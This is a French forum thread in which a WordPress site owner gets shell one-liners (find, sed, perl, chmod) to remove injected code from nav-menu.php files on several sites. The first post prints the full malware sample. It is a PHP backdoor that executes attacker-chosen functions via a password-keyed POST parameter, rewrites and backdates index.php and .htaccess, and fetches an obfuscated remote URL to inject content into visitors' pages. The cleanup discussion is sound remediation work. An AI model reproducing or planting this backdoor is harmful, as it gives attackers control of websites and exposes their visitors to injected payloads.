Aide sur commande Shell linux find ou sed

**lolo81100** · 15/06/2016, 14h52

Bonjour
J'aimerai supprimer cette chaîne de code injecté ci-dessous dans des fichiers nav-menu.php dans les dossiers wp-includes de plusieurs sites wordpress à l'aide d'un commande shell linux de type find . -name "*" -type f -exec sed -i......
On m'a donné ça :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

$ perl -i.orig -p0e "s#//istart[\W\w]+//iend##ig" $(find .)

avec ce commentaire :
Ce sera probablement plus simple avec perl. On peut le faire avec une commande de ce style :
Pour les explications, il faudra aller sur Internet et dans le man de perl.
Quelques indications :
* -i.orig pour garder une sauvegarde des fichiers en .orig avant de modifier
* L'expression régulière "s#//istart[\W\w]+//iend##ig" pour remplacer tout ce qui se situe entre //istart et //iend (inclus) par une chaine vide. A noter que j'ai utilisé [\W\w] parce que pour une raison obscure, le . ne semble pas fonctionner sur ma version de perl. En principe on doit pouvoir utiliser un . à cet endroit.
* $(find .) pour chercher les fichiers à remplacer et les mettre en argument de perl
Mais je n'ai pas assez de connaissance pour fabriquer la commande...
Merci de votre aide.
Laurent

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
//istart
 
function my_time($dir) {
    foreach (glob($dir . '/wp-*.php') as $f) {
        $times[] = filemtime($f);
    }
    $max = 1;
    for ($i = 0; $i < count($times) - 1; $i++) {
        $k = 1;
        for ($j = $i + 1; $j < count($times); $j++) {
            if ($times[$i] == $times[$j]) {
                $k++;
                if ($k > $max) {
                    $max = $k;
                    $time = $times[$i];
                }
            }
        }
    }
    return $time;
}
 
function my_correct($dir) {
    $time = 0;
    $path = $dir . '/index.php';
    $content = base64_decode('PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==');
    if (file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        $time = my_time($dir);
        touch($path, $time);
    }
 
    $path = $dir . '/.htaccess';
    $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
    if (file_exists($path) AND file_get_contents($path) != $content) {
        chmod($path, 0644);
        file_put_contents($path, $content);
        chmod($path, 0444);
        if (!$time) {
            $time = my_time($dir);
        }
        touch($path, $time);
    }
}
 
$p = $_POST;
$_passssword = 'f8a615de2baafc38d3a12933039ca3f4';
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
my_correct(dirname(__FILE__) . '/..');
 
function request_url_data($url) {
    if(!is_valid_url($url))
        return false;
 
    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}
 
error_reporting(0);
 
//unset($_passssword);
 
if (function_exists("add_action")) {
    add_action('wp_head', 'add_2head');
    add_action('wp_footer', 'add_2footer');
}
 
function add_2head() {
    ob_start();
}
 
function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}
 
function add_2footer() {
    $check = false;
    $check_data = "";
    if (!empty($_GET['check']) AND $_GET['check'] == 'f8a615de2baafc38d3a12933039ca3f4') {
        $check = true;
        $check_data = ('<!--checker_start ');
        $check_data .= (substr(request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'), 0, 100));
        $check_data .= (' checker_end-->');
    }
 
    if (!$check) {
        if ($_SERVER['REQUEST_METHOD'] != 'GET')
            return;
        if (!@$_SERVER['HTTP_USER_AGENT'] OR (substr($_SERVER['REMOTE_ADDR'], 0, 6) == '74.125') OR preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT']))
            return;
 
 
        $cookie_name = 'PHP_SESSION_PHP';
        if (isset($_COOKIE[$cookie_name]))
            return;
 
        foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
            if (preg_match($regex, $_SERVER['REQUEST_URI']))
                return;
        }
 
    }
 
    $buffer = ob_get_clean();
    ob_start();
    $regexp = '/<body[^>]*>/is';
    if (preg_match($regexp, $buffer, $m)) {
        $body = $m[0];
//        $url = base64_decode('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjc6Ojs6OTs1NDI0OzkyOjYy');
        $url = decrypt_url('a3d3czksLDE3Mi07Ni0xMS0xMjEsYW9sZCw8YmBmcSV2d25ccGx2cWBmPjc6Ojs6OTs1NDI0OzkyOjYy');
//        if (($code = request_url_data($url)) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
        if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
//            $body .=  '<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000); document.cookie="' . $cookie_name . '=' . mt_rand(1, 1024) . '; path=/; expires="+date.toUTCString();</script>';
//            $body .= base64_decode($m[0]);
            $body .= $decoded;
//            $body .= base64_decode($m[0]);
        }
        $body .= $check_data;
 
        $buffer = preg_replace($regexp, $body, $buffer);
    }
    echo $buffer;
    ob_flush();
}
 
function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}//iend

**BufferBob** · 15/06/2016, 15h46

salut,

tout ce que tu dis c'est que tu aimerai faire un truc et que quelqu'un t'a donné une solution pour le faire.

je te propose une autre solution, à base de grep et de sed :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

grep -rl '//istart' mon_repertoire/ | xargs sed -i '\%//istart%,\%//iend%d'

c'est un grep récursif, quand il trouve le pattern //istart il essaye de supprimer le bloc de lignes comprises entre //istart et //iend via sed
si la commande prend trop de temps y'a toujours moyen de l'accélérer

j'ai pas testé le oneliner perl mais effectivement le [\W\w] ne me parait pas approprié, en revanche le sien conserve une copie .orig de chaque fichier modifié, ce qui peut éventuellement être une bonne idée.

**disedorgue** · 16/06/2016, 21h31

Bonjour,
@BufferBob: je pense qu'il y a une erreur dans ta regex sed...
Sinon, si on suit le besoin: supprimer dans les fichiers "nav-menu.php" les données se trouvant entre les chaines //istart et //iend elle même comprise et pouvant se trouver sur plusieurs lignes...
Bah, autant le faire comme suggéré: avec find et perl, donc quelque chose comme ça (pas totalement testé):

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name 'nav-menu.php' -exec perl -i.orig -pe 'BEGIN{undef $/;} s<//istart.*//iend><>smg' {} \;

**BufferBob** · 17/06/2016, 07h30

Envoyé par disedorgue

@BufferBob: je pense qu'il y a une erreur dans ta regex sed...

je sais pas pourquoi j'ai senti arriver le truc, il me semble qu'on a déjà vu un problème similaire dans une autre discussion il y a quelques temps
chez moi ça fonctionne (GNU sed 4.2.2), la manpage locale stipule :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
       \cregexpc
              Match lines matching the regular expression regexp.  The c may be any character.

**disedorgue** · 17/06/2016, 08h01

Je ne parlais pas d'un disfonctionnement de sed, mais d'une double erreur dans la regexp ( comme un petit "i" manquant, voir plus )

**BufferBob** · 17/06/2016, 09h09

arf, bien vu.

(je modifie)

**lolo81100** · 17/06/2016, 19h11

bonjour,
Merci à tous,
j'ai fait avec ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name 'nav-menu.php' -exec perl -i.orig -pe 'BEGIN{undef $/;} s<//istart.*//iend><>smg' {} \;

qui me supprime exactement le code et pas la ligne
Ceci :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

grep -rl '//istart' mon_repertoire/ | xargs sed -i '\%//istart%,\%//iend%d'

me supprime les lignes contenant le code. Hors je ne voulais supprimer que le code et pas la ligne car il y avait du code que je voulais garder avant dans ce code.
De plus, la commande find travaille sur le fichier nav-menu.php et en plus j'ai une copie de secours
Merci
Laurent

**lolo81100** · 18/06/2016, 10h12

bonjour,
y-a til un moyen de faire une commande qui modifie partout le chmod en 705 de mes dossiers wp-includes puis de faire

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name 'nav-menu.php' -exec perl -i.orig -pe 'BEGIN{undef $/;} s<//istart.*//iend><>smg' {} \;

et remettre wp-includes en 505
J'aimerai lancer cette commande dans un dossier parent qui contient plusieurs sites
Merci
Laurent

**disedorgue** · 18/06/2016, 13h46

En gardant le même principe (pas testé totalement) :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name 'nav-menu.php' -exec  bash -c  'XX=$(dirname {}) ; chmod 705  "${XX}" ; perl -i.orig -pe "BEGIN{undef $/;} s<//istart.*//iend><>smg" {} ; chmod 505 "${XX}"' \;

**lolo81100** · 18/06/2016, 15h43

re,
merci bcp, ça fonctionne parfaitement.
Vous m'avez fait gagné des heures de travail !!!
Cordialement
Laurent

**BufferBob** · 18/06/2016, 16h05

Envoyé par lolo81100

Vous m'avez fait gagné des heures de travail !!!

on t'enverra la facture

**lolo81100** · 18/06/2016, 19h34

re,
franchement, votre aide mérite salaire !

**disedorgue** · 19/06/2016, 00h35

Dans ce cas, il faudrait que la rénumération se fasse sur le temps que tu aurais perdu pour le faire à la main, car pour ma part, ça m'a pris au plus dans les 15 minutes (et je suis large

).
Et j'estime que ce n'est pas du temps perdu si cela permet à quelqu'un d'apprendre quelque chose...

**lolo81100** · 19/06/2016, 00h45

re,
à vue de nez, je dirai 1 journée de travail...
Merci pour cette aide précieuse. Et merci d'apprendre aux autres !
J'aimerai bien avoir tout compris à cette commande, mais même en la décomposant, je m'y perds un peu...
Laurent

**disedorgue** · 19/06/2016, 11h24

Dans ce cas, décomposons la commande:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

find . -name 'nav-menu.php' -exec  bash -c  'XX=$(dirname {}) ; chmod 705  "${XX}" ; perl -i.orig -pe "BEGIN{undef $/;} s<//istart.*//iend><>smg" {} ; chmod 505 "${XX}"' \;

find . -name 'nav-menu.php' -exec : on recherche depuis le répertoire courant (et sous répertoires) tous les fichiers nav-menu.php et pour chacun d'eux on execute une commande.
( Un petit détail qui à son importance: find remplace par défaut la chaine {} par le nom du fichier relatif au répertoire de départ de la recherche avant de lancer la commande à exécuter.)

Donc, ici, la commande exécutée par find pour chaque fichier trouvé est:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

bash -c  'XX=$(dirname {}) ; chmod 705  "${XX}" ; perl -i.orig -pe "BEGIN{undef $/;} s<//istart.*//iend><>smg" {} ; chmod 505 "${XX}"'

Ici, que fait-on:
XX=$(dirname {}): mettre dans la variable XX la valeur de [/C]{}[/C] en supprimant son dernier composant ainsi que le dernier /.
Donc pour faire simple, on met le nom de répertoire où se trouve le fichier dans XX.
chmod 705 "${XX}": ici, on change les droits de XX (qui est comme expliqué juste avant, le nom du répertoire où se trouve le fichier que l'on traite)
perl -i.orig -pe "BEGIN{undef $/;} s<//istart.*//iend><>smg" {}: ici, on traite le fichier.
chmod 505 "${XX}": déjà expliqué 2 lignes au dessus.
le \; permet de spécifier à find où se termine la commande à executer.

Et voila, pour les explications

**lolo81100** · 19/06/2016, 11h50

re,
merci pour cette explication. Je pense avoir compris. Le refaire dans un autre cas, c'est une autre histoire. Je suppose qu'il n'existe pas de générateur de commande comme celle-ci sur le web ?
Puis-je connaitre votre métier ?
Laurent

**disedorgue** · 19/06/2016, 13h18

Ca existe peut-être mais dans ce cas avec des limites très fortes.
Le plus simple est de pratiquer pour que cela devienne presque du reflexe.

Quand à mon métier... si je le savais moi-même

Actuellement, je suis sur un poste de chef de projet MOE.

**lolo81100** · 20/06/2016, 22h30

bonjour disedorgue
je vous ai laissé un message en privé
L'avez-vous eu ?
Laurent

Aide sur commande Shell linux find ou sed

Shell et commandes GNU

Partager

Partager